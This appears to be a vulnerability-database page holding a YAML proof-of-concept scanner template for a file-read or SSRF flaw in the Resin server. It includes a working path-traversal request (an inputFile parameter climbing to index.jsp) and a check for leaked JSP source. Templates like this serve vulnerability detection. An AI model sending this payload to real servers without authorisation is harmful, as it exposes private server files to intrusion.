resin-inputfile-fileread-or-ssrf: resin inputfile fileread

2025-08-01 resin PoC Public

Description

resin inputfile fileread or ssrf

PoC

id: resin-inputfile-fileread-or-ssrf

info:
  name: resin inputfile fileread
  author: whynot
  severity: high
  verified: true
  description: |-
    resin inputfile fileread or ssrf
  tags: resin,fileread,ssrf
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
    expression: response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>"))
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities